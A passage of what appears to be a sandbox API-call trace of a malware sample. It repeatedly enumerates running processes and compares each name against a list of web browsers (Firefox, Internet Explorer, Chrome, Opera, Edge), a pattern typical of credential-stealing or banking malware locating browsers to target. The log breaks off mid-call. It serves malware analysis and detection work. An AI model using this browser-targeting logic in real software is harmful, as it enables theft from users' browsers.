(lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0198.726] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0198.726] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0198.726] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.726] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0198.727] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0198.727] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0198.727] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0198.727] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0198.727] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.727] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.727] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0198.727] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0198.727] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0198.727] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0198.727] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.727] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0198.728] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0198.728] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0198.728] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0198.728] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0198.728] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0198.728] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0198.729] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0198.729] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0198.729] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0198.729] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0198.729] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.729] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0198.729] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0198.729] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0198.729] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0198.729] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0198.729] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.729] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0198.730] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0198.730] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0198.730] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0198.730] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0198.730] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0198.730] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0198.730] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0198.730] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0198.730] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0198.730] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0198.730] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0198.730] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0198.731] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0198.731] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0198.731] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0198.731] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0198.731] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0198.731] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0198.768] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0198.768] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0198.769] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0198.769] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0198.769] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0198.769] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0198.769] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0198.769] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0198.769] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0198.769] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0198.769] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0198.769] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0198.770] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="firefox.exe") returned 1 [0198.770] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="iexplore.exe") returned 1 [0198.770] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="chrome.exe") returned 1 [0198.770] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="opera.exe") returned 1 [0198.770] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.770] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0198.770] CloseHandle (hObject=0xe8) returned 1 [0198.770] Sleep (dwMilliseconds=0x3e8) [0199.829] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0199.831] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0199.832] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0199.832] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0199.832] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0199.832] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0199.832] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0199.832] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0199.832] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0199.832] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0199.832] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0199.832] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0199.832] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0199.832] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0199.833] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0199.833] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0199.833] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0199.833] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0199.833] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.833] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0199.833] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0199.833] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0199.833] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0199.833] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0199.833] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0199.833] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0199.834] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0199.834] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0199.834] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0199.834] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0199.834] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.834] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0199.834] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0199.834] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0199.835] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0199.835] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0199.835] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0199.835] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0199.835] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0199.835] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0199.835] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0199.835] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0199.835] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.835] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0199.836] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0199.836] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0199.836] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0199.836] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0199.836] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.836] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0199.836] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0199.836] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0199.836] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0199.836] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0199.836] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0199.836] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0199.837] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0199.837] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0199.837] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0199.837] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0199.837] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0199.837] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.838] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0199.838] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0199.838] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0199.838] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0199.838] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.838] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.838] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0199.838] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0199.838] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0199.838] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0199.838] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.838] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.839] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0199.839] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0199.839] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0199.839] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0199.839] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.839] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.839] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0199.839] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0199.839] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0199.839] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0199.839] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.839] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.840] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0199.840] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0199.840] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0199.840] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0199.840] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.840] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0199.841] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0199.841] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0199.841] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0199.841] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0199.841] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0199.841] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.841] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0199.841] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0199.841] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0199.841] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0199.841] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.841] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.842] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0199.842] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0199.842] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0199.842] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0199.842] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.842] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0199.842] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0199.842] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0199.842] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0199.842] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0199.842] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0199.842] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0199.843] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0199.843] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0199.843] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0199.843] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0199.843] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.843] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0199.843] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0199.843] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0199.844] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0199.844] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0199.844] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.844] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.844] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0199.844] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0199.844] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0199.844] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0199.844] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.844] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0199.845] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0199.845] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0199.845] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0199.845] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0199.845] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.845] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0199.845] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0199.845] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0199.845] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0199.845] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0199.845] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0199.845] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0199.846] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0199.846] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0199.846] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0199.846] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0199.846] lstrcmpiA 